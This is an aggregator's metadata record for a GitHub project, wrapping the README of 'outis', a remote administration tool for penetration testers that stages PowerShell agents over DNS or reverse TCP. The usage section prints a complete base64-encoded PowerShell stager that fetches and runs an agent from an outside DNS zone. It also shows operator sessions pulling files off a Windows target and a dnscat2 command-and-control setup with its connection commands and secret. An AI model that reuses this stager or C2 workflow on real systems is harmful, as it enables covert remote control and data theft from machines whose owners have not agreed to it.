{"id":21573686,"url":"https://github.com/syss-research/outis","last_synced_at":"2025-04-10T16:06:58.539Z","repository":{"id":119357015,"uuid":"89705274","full_name":"SySS-Research/outis","owner":"SySS-Research","description":"outis is a custom Remote Administration Tool (RAT) or something like that. It was build to support various transport methods (like DNS) and platforms (like Powershell).","archived":false,"fork":false,"pushed_at":"2017-09-19T16:53:54.000Z","size":229,"stargazers_count":126,"open_issues_count":0,"forks_count":45,"subscribers_count":13,"default_branch":"master","last_synced_at":"2025-03-24T13:51:20.355Z","etag":null,"topics":["agent","dns","powershell","rat","security","security-tools","tool"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/SySS-Research.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2017-04-28T12:46:06.000Z","updated_at":"2025-03-05T06:59:19.000Z","dependencies_parsed_at":null,"dependency_job_id":"ab0d91a6-9842-48a0-93d0-988808741d50","html_url":"https://github.com/SySS-Research/outis","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SySS-Research%2Foutis","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SySS-Research%2Foutis/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SySS-Research%2Foutis/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SySS-Research%2Foutis/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/SySS-Research","download_url":"https://codeload.github.com/SySS-Research/outis/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248250743,"owners_count":21072682,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["agent","dns","powershell","rat","security","security-tools","tool"],"created_at":"2024-11-24T12:07:43.475Z","updated_at":"2025-04-10T16:06:58.515Z","avatar_url":"https://github.com/SySS-Research.png","language":"Python","funding_links":[],"categories":["\u003ca id=\"9e3a9beb5ecf36b9624525bc3cfef78a\"\u003e\u003c/a\u003e工具"],"sub_categories":["\u003ca id=\"1da695fd3dec80b88aadb1b7c724330f\"\u003e\u003c/a\u003eWindows"],"readme":"outis\n=====\n\noutis is a custom Remote Administration Tool (RAT) or something like that. Think Meterpreter or Empire-Agent. However, the focus of this tool is neither an exploit toolkit (there are no exploits) nor persistent management of targets. The focus is to communicate between server and target system and to transfer files, share sockets, spawn shells and so on using various methods and platforms.\n\n\nOn the Name\n===========\n\nThe cyclops Polyphemus in Homer's Odyssey had some issues with name resolution. When he asked for Odysseus' name, the hacker told him it is \"Outis\" meaning \"Nobody\" in ancient Greek. Thus, when Polyphemus later shouted, that Nobody was about to kill him, strangly no help arrived.\n\nMy thanks to Marcel for remembering this marvelous piece of classic tale.\n\n\nDependencies for the Handler\n============================\n\nArchlinux users can install the following packages:\n\n * python3 # includes cmd, tempfile, ...\n * python-progressbar2\n * python-dnspython\n * python-crypto\n * python-pyopenssl\n * and maybe more...\n\nIn other distributions the names may differ, for instance, there is a module named crypto and a module named pycrypto. We need the latter.\n\nAlso, older versions might cause problems:\n\n * pyopenssl needs to be version 16.1.0 or newer, check as follows:\n ```\n $ python3 -c 'import OpenSSL; print(OpenSSL.version.__version__)'\n ```\n\nYou can set up a python virtual environment quite easily:\n\n```\n$ virtualenv outis-venv\n$ source ./outis-venv/bin/activate\n(outis-venv) $ pip install progressbar2 dnspython pycrypto pyopenssl\n```\n\nThis results to the following package list, which seems to work for me:\n\n```\n$ pip freeze\nappdirs==1.4.3\nasn1crypto==0.22.0\ncffi==1.10.0\ncryptography==1.8.1\ndnspython==1.15.0\nidna==2.5\npackaging==16.8\nprogressbar2==3.18.1\npycparser==2.17\npycrypto==2.6.1\npyOpenSSL==16.2.0\npyparsing==2.2.0\npython-utils==2.1.0\nsix==1.10.0\n```\n\n\nInstallation\n============\n\nClone this git with recursive flag to also clone its submodules in the thirdpartytools folder:\n\n```\ngit clone --recursive ...\n```\n\nThe handler runs on Python 3. Install its dependencies and run it. It will generate stagers, agents and everything else for you.\n\nTo bind low ports without needing root privileges, consider using a capability wrapper.\n\n\nTerms\n=====\n\n * **agent**: software, that runs on the victim system\n * **handler**: software, that parses your commands and leads the agents (usually it runs on your server)\n * **stager**: short script that downloads the agent (using the transport module) and runs it\n * **transport**: communication channel between stager/agent and handler, e.g. ReverseTCP\n * **platform**: victim architecture to use for stager/agent scripts, e.g. PowerShell\n\n\nCurrently Supported Plattforms\n==============================\n\n * PowerShell (partial)\n\n\nCurrently Supported Transports\n==============================\n\n * Reverse TCP\n * DNS (types TXT or A for staging, and types TXT, CNAME, MX, AAAA or A for agent connection)\n\n\nCurrently Supported Cryptography\n================================\n\n * Agent stages can be encoded (for obfuscation, not for security) using cyclic XOR\n * Agent stages can be authenticated using RSA signatures and pinned certificates\n * Transport connections can be encrypted / authenticated using TLS and pinned certificates\n\n\nCurrently Supported Commands and Controls\n=========================================\n\n * ping requests to test the connection (partial)\n * text message format (partial)\n * upload and download of files\n\n\nCurrently Supported Extras\n==========================\n\n * When using DNS transport with stager and powershell, you can stage the tool dnscat2 / dnscat2-powershell from the thirdpartytools directory instead of the default outis agent. Set the platform option AGENTTYPE to DNSCAT2 (will take a while, but uses only DNS to stage) or DNSCAT2DOWNLOADER (tries to download using HTTPS).\n\n\nUsage Examples\n==============\n\nDownload of a file using staged DNS transport with POWERSHELL platform could look like this:\n\n```raw\n$ outis\noutis\u003e set TRANSPORT DNS\noutis\u003e set ZONE zfs.sy.gs\noutis\u003e set AGENTDEBUG TRUE\noutis\u003e info\n[+] Options for the Handler:\nName Value Required Description \n----------------- ---------- -------- -----------------------------------------------------------------\nTRANSPORT DNS True Communication way between agent and handler (Options: REVERSETCP,\n DNS)\nCHANNELENCRYPTION TLS True Encryption Protocol in the transport (Options: NONE, TLS)\nPLATFORM POWERSHELL True Platform of agent code (Options: POWERSHELL)\nPROGRESSBAR TRUE True Display a progressbar for uploading / downloading? (only if not \n debugging the relevant module) (Options: TRUE, FALSE)\n\n[+] Options for the TRANSPORT module DNS:\nName Value Required Description \n--------- ----------- -------- ------------------------------------------------------------------------\nZONE zfs.sy.gs True DNS Zone for handling requests\nLHOST 0.0.0.0 True Interface IP to listen on\nLPORT 53 True UDP-Port to listen on for DNS server\nDNSTYPE TXT True DNS type to use for the connection (stager only, the agent will \n enumerate all supported types on its own) (Options: TXT, A)\nDNSSERVER False IP address of DNS server to connect for all queries\n\n[+] Options for the PLATFORM module POWERSHELL:\nName Value Required Description \n-------------------- -------------------------- -------- ----------------------------------------------\nSTAGED TRUE True Is the communication setup staged or not? \n (Options: TRUE, FALSE)\nSTAGEENCODING TRUE True Should we send the staged agent in an encoded \n form (obscurity, not for security!) (Options: \n TRUE, FALSE)\nSTAGEAUTHENTICATION TRUE True Should the stager verify the agent code \n before executing (RSA signature verification \n with certificate pinning) (Options: TRUE, \n FALSE)\nSTAGECERTIFICATEFILE $TOOLPATH/data/outis.pem False File path of a PEM with both RSA key and \n certificate to sign and verify staged agent \n with (you can generate a selfsigned cert by \n using the script gencert.sh initially)\nAGENTTYPE DEFAULT True Defines which agent should be used (the \n default outis agent for this plattform, or \n some third party software we support) \n (Options: DEFAULT, DNSCAT2, DNSCAT2DOWNLOADER)\nTIMEOUT 9 True Number of seconds to wait for each request \n (currently only supported by DNS stagers)\nRETRIES 2 True Retry each request for this number of times \n (currently only supported by DNS stagers)\nAGENTDEBUG TRUE True Should the agent print and log debug messages \n (Options: TRUE, FALSE)\noutis\u003e generatestager\n[+] Use the following stager code:\npowershell.exe -Enc JAByAD0ARwBlAHQALQBSAGEAbgBkAG8AbQA7ACQAYQA9ACIAIgA7ACQAdAA9ADAAOwBmAG8AcgAoACQAaQA9ADAAOwA7\n ACQAaQArACsAKQB7ACQAYwA9ACgAWwBzAHQAcgBpAG4AZwBdACgASQBFAFgAIAAiAG4AcwBsAG8AbwBrAHUAcAAgAC0AdAB5AHAAZQA9AFQAWA\n BUACAALQB0AGkAbQBlAG8AdQB0AD0AOQAgAHMAJAAoACQAaQApAHIAJAAoACQAcgApAC4AegBmAHMALgBzAHkALgBnAHMALgAgACIAKQApAC4A\n UwBwAGwAaQB0ACgAJwAiACcAKQBbADEAXQA7AGkAZgAoACEAJABjACkAewBpAGYAKAAkAHQAKwArAC0AbAB0ADIAKQB7ACQAaQAtAC0AOwBjAG\n 8AbgB0AGkAbgB1AGUAOwB9AGIAcgBlAGEAawA7AH0AJAB0AD0AMAA7ACQAYQArAD0AJABjADsAfQAkAGEAPQBbAEMAbwBuAHYAZQByAHQAXQA6\n ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYQApADsAJABiAD0AJABhAC4ATABlAG4AZwB0AGgAOwAkAGYAcAA9ACIAWA\n B4AEkAMgArAGUAQgBoAGUAUgBMAFMATQBuAHIAVQBNAFgAbgBnAHIARABTAGQATwAyAGQAOAAwAGMAZAB2AHcAcwBKAGMAYwBGAEIAbgAvAGYA\n LwB3AEoATwBpAEIAVAA4AGIATwA2AHAAZgBXAFgAdwBwAEUATwBQAFAAUgBsAFAAdgBnAE8AbgBlAGcAYwBpAE8AYgBPAGEAZABOAFAAVQBxAH\n AAZgBRAD0APQAiADsAJABpAD0AMAA7ACQAYQA9ACQAYQB8ACUAewAkAF8ALQBiAFgAbwByACQAZgBwAFsAJABpACsAKwAlACQAZgBwAC4ATABl\n AG4AZwB0AGgAXQB9ADsAJABwAGsAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAAwACwANwA1ADUAKQA7ACQAcw\n BpAGcAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAA3ADUANQAsADYAOAA0ACkAOwAkAHMAPQBOAGUAdwAtAE8A\n YgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAAxADQAMwA5ACwAKAAkAGIALQAxADQAMwA5ACkAKQA7ACQAcwBoAGEAPQBOAGUAdwAtAE\n 8AYgBqAGUAYwB0ACAAUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBTAEgAQQA1ADEAMgBNAGEAbgBhAGcAZQBk\n ADsAaQBmACgAQAAoAEMAbwBtAHAAYQByAGUALQBPAGIAagBlAGMAdAAgACQAcwBoAGEALgBDAG8AbQBwAHUAdABlAEgAYQBzAGgAKAAkAHAAaw\n AuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAKQAgACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIA\n aQBuAGcAKAAkAGYAcAApACkAIAAtAFMAeQBuAGMAVwBpAG4AZABvAHcAIAAwACkALgBMAGUAbgBnAHQAaAAgAC0AbgBlACAAMAApAHsAIgBFAF\n IAUgBPAFIAMQAiADsARQB4AGkAdAAoADEAKQB9ADsAJAB4AD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5\n AHAAdABvAGcAcgBhAHAAaAB5AC4AUgBTAEEAQwByAHkAcAB0AG8AUwBlAHIAdgBpAGMAZQBQAHIAbwB2AGkAZABlAHIAOwAkAHgALgBGAHIAbw\n BtAFgAbQBsAFMAdAByAGkAbgBnACgAJABwAGsAKQA7AGkAZgAoAC0ATgBvAHQAIAAkAHgALgBWAGUAcgBpAGYAeQBEAGEAdABhACgAJABzAC4A\n VABvAEMAaABhAHIAQQByAHIAYQB5ACgAKQAsACIAUwBIAEEANQAxADIAIgAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG\n UANgA0AFMAdAByAGkAbgBnACgAJABzAGkAZwApACkAKQB7ACIARQBSAFIATwBSADIAIgA7AEUAeABpAHQAKAAyACkAfQA7ACIARwBPAEEARwBF\n AE4AVAAiADsASQBFAFgAIAAkAHMAOwA=\noutis\u003e run\n[+] DNS listening on 0.0.0.0:53\n[+] Sending staged agent (34332 bytes)...\n100% (184 of 184) |########################################################| Elapsed Time: 0:00:16 Time: 0:00:16\n[+] Staging done\n[+] Waiting for connection and TLS handshake...\n[+] Initial connection with new agent started\n[+] Upgrade to TLS done\noutis session\u003e [+] AGENT: Hello from Agent\n\noutis session\u003e download C:\\testfile.txt /tmp/out.txt\n[+] initiating download of remote file C:\\testfile.txt to local file /tmp/out.txt\n[+] agent reports a size of 3295 bytes for channel 1\n100% (3295 of 3295) |######################################################| Elapsed Time: 0:00:00 Time: 0:00:00\n[+] wrote 3295 bytes to file /tmp/out.txt\noutis session\u003e exit\nDo you really want to exit the session and close the connection [y/N]? y\noutis\u003e exit\n```\n\nOr maybe we want to use dnscat2 for the real deal and just use outis to stage it:\n\n```raw\n$ outis\noutis\u003e set TRANSPORT DNS\noutis\u003e set AGENTTYPE DNSCAT2\noutis\u003e set ZONE zfs.sy.gs\noutis\u003e run\n[+] DNS listening on 0.0.0.0:53\n[+] Sending staged agent (406569 bytes)...\n100% (2185 of 2185) |#######################################################| Elapsed Time: 0:01:17 Time: 0:01:17\n[+] Staging done\n[+] Starting dnscat2 to handle the real connection\n\nNew window created: 0\nNew window created: crypto-debug\nWelcome to dnscat2! Some documentation may be out of date.\n\nauto_attach =\u003e false\nhistory_size (for new windows) =\u003e 1000\nSecurity policy changed: All connections must be encrypted and authenticated\nNew window created: dns1\nStarting Dnscat2 DNS server on 0.0.0.0:53\n[domains = zfs.sy.gs]...\n\nAssuming you have an authoritative DNS server, you can run\nthe client anywhere with the following (--secret is optional):\n\n ./dnscat --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg== zfs.sy.gs\n\nTo talk directly to the server without a domain name, run:\n\n ./dnscat --dns server=x.x.x.x,port=53 --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg==\n\nOf course, you have to figure out \u003cserver\u003e yourself! Clients\nwill connect directly on UDP port 53.\n\ndnscat2\u003e New window created: 1\nSession 1 Security: ENCRYPTED AND VERIFIED!\n(the security depends on the strength of your pre-shared secret!)\n\ndnscat2\u003e sessions\n0 :: main [active]\n crypto-debug :: Debug window for crypto stuff [*]\n dns1 :: DNS Driver running on 0.0.0.0:53 domains = zfs.sy.gs [*]\n 1 :: command (feynman-win7) [encrypted and verified] [*]\n \ndnscat2\u003e session -i 1\nNew window created: 1\nhistory_size (session) =\u003e 1000\nSession 1 Security: ENCRYPTED AND VERIFIED!\n(the security depends on the strength of your pre-shared secret!)\nThis is a command session!\n\nThat means you can enter a dnscat2 command such as\n'ping'! For a full list of clients, try 'help'.\n\ncommand (feynman-win7) 1\u003e download c:/testfile.txt /tmp/out.txt\nAttempting to download c:/testfile.txt to /tmp/out.txt\nWrote 3295 bytes from c:/testfile.txt to /tmp/out.txt!\n\ncommand (feynman-win7) 1\u003e exit\nInput thread is over\n```\n\nInspirations\n============\n\nThis project was inspired by (and shamelessly stole part of its code from):\n\n * Empire:\n * https://github.com/adaptivethreat/Empire/blob/master/lib/common/stagers.py\n — generate_launcher uses a HTTP(S) stager\n * https://github.com/adaptivethreat/Empire/tree/master/data/agent\n — stager (step two after initial launcher) and agent (step three)\n * https://github.com/EmpireProject/Empire/blob/master/lib/common/helpers.py\n — powershell script generation and stipping\n\n * Metasploit:\n * https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/cmdstager.rb\n — CmdStager for bourne, ...\n\n * ReflectiveDLLInjection:\n * https://github.com/stephenfewer/ReflectiveDLLInjection\n \n * p0wnedShell:\n * https://github.com/Cn33liz/p0wnedShell\n — some ideas for AMSI evation for future use\n \n * dnscat2:\n * https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md\n — ideas on protocol design over DNS\n * https://github.com/lukebaggett/dnscat2-powershell/blob/master/dnscat2.ps1\n — powershell version of the dnscat2 agent\n \n * dnsftp\n * https://github.com/breenmachine/dnsftp\n — short script parts for stagers via DNS\n\nDisclaimer\n==========\n\nUse at your own risk. Do not use without full consent of everyone involved.\nFor educational purposes only.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsyss-research%2Foutis","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsyss-research%2Foutis","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsyss-research%2Foutis/lists"}